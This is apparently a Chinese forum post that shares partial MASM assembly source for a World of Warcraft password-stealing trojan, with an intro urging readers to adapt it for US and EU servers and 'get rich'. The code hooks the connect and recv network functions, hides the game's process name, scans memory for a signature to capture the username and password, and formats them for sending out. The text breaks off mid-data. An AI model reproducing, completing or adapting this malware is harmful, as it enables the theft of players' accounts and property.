对应游戏版本v2.4.3.8606。这个只是核心代码,而非完整代码,通过调式完全可以写出美服跟欧服的WOW马来,大家发财去吧
Quote:
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>;
; Programmed by asm, MSN:asm32@live.cn ;
; WOWGameMaker For WOW_MF_OF ;
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>;
;0041DAEA |. 5E pop esi <-------------特征码位置+12=断点位置
;0041DAEB |. 33CD xor ecx, ebp
;0041DAED |. 5B pop ebx
;0041DAEE |. E8 E7CAFEFF call 0040A5DA
;0041DAF3 |. 8BE5 mov esp, ebp
;0041DAF5 |. 5D pop ebp <-------------断点位置
;0041DAF6 /. C2 0400 retn 4 <-------------ret执行后,游戏会跳转到005B55B4h这里执行。因此在木马里要
;搜索这个地址得特征码从而得到通用得地址,而不是直接采用硬编码 = =。再得到通用得地址后执行 mov eax,hJmpEip/jmp eax即可
;szUserPassRealCode db 5Eh, 33h, 0CDh,5Bh, 0E8h, 0E7h,0CAh,0FEh,0FFh,8Bh,0E5h,5Dh,0C2h, 04h,00h
;005B55B4 8B4D FC mov ecx, dword ptr [ebp-4] <-----------------得到要跳转的地址
;005B55B7 5F pop edi
;005B55B8 5E pop esi
;005B55B9 |. 33CD xor ecx, ebp
;005B55BB |. 5B pop ebx
;005B55BC |. E8 1950E5FF call 0040A5DA
;005B55C1 8BE5 mov esp, ebp
;szJmpEip db 8Bh,4Dh, 0FCh,5Fh,5Eh,33h,0CDh,5Bh,0E8h, 19h,50h,0E5h,0FFh,8Bh,0E5h
;----------------------------------------------------------------------------------------------------------------
.486
.model flat,stdcall
option casemap:none
include debug.inc
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include advapi32.inc
includelib advapi32.lib
include comctl32.inc
includelib comctl32.lib
include psapi.inc
includelib psapi.lib
IncludeLib Masm32.lib
Include Masm32.inc
include Shlwapi.inc
includelib Shlwapi.lib
include shell32.inc
includelib shell32.lib
include macros.inc
includelib mylib.lib
include wininet.inc
includelib wininet.lib
HOOKAPI struct
a byte 0B8h
PMyapi DWORD 0
d BYTE 0FFh
e BYTE 0E0h
HOOKAPI ends
MODULEINFO struct
lpBaseOfDll dword 0
SizeOfImage dword 0
EntryPoint dword 0
MODULEINFO ends
F_STOP equ 0002h
;子程序声明
HookApi proto :DWORD ,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
HookApi1 proto :DWORD ,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
HookApiRecv proto :DWORD ,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
WriteApi proto :DWORD ,:DWORD,:DWORD,:DWORD
WriteApi1 proto :DWORD ,:DWORD,:DWORD,:DWORD
MyHookFunToGetUserAndPass proto :DWORD ,:DWORD,:DWORD
MyConnect proto :DWORD ,:DWORD,:DWORD;,:DWORD
MyRecv proto :DWORD ,:DWORD,:DWORD,:DWORD
GetApi proto :DWORD,:DWORD
BakDll proto :DWORD,:DWORD
AntiFileToRun proto c :DWORD
BytePos proto c :DWORD,:DWORD,:DWORD,:DWORD,:DWORD
LoadModuleEx proto c :DWORD
GetModuleImageSize proto c :DWORD
CaleHookPointerWOW proto c
ExtractFileName proto c :DWORD
ExtractFilePath proto c :DWORD
;已初始化数据
.data
hInstance dd 0
WProcess dd 0
Papi1 DWORD ?
Papi2 DWORD ?
Papi3 DWORD ?
WritBak1 HOOKAPI <>
WritBak2 HOOKAPI <>
ApiBak1 db 10 dup(?)
ApiBak2 db 10 dup(?)
DllName1 db "ws2_32.dll",0
ApiName1 db "connect",0
ApiName2 db "recv",0
ApiName3 db "hook",0
szWowprocess db "g&mpm",0 ;wow.exe加密
Dllbase1 DWORD ?
NowDllbase1 DWORD ?
NowDllbase2 DWORD ?
dwTemp dd ?
hAdress dd ?
;Dllbase2 DWORD ?
;NowDllbase2 DWORD ?
hRecvBak dd ?
hRecv dd ?
szJmp db 0C2h,04h,00h,0cch,0cch,0cch,0cch ;恢复
szJmpRecv db 8Bh,0FFh,55h,8Bh,0ECh,83h,0ECh, 10h,53h,33h,0DBh,81h,3Dh, 28h,40h,0A3h,71h,56h,0Fh,84h, 5Eh,50h,00h,00h
szWOWFmt db "wowu=%s&wowp=%s&wowf=%s",13,10,13,10,0
szUserPassRealCode db 5Eh, 33h, 0CDh,5Bh, 0E8h, 0E7h,0CAh,0FEh,0FFh,8Bh,0E5h,5Dh,0C2h, 04h,00h
szJmpEip db 8Bh,4Dh, 0FCh,5Fh,5Eh,33h,0CDh,5Bh,0E8h, 19h,50h,0E5h,0FFh,8Bh,0E5h
szEbpEnter db 6Ah, 40h, 5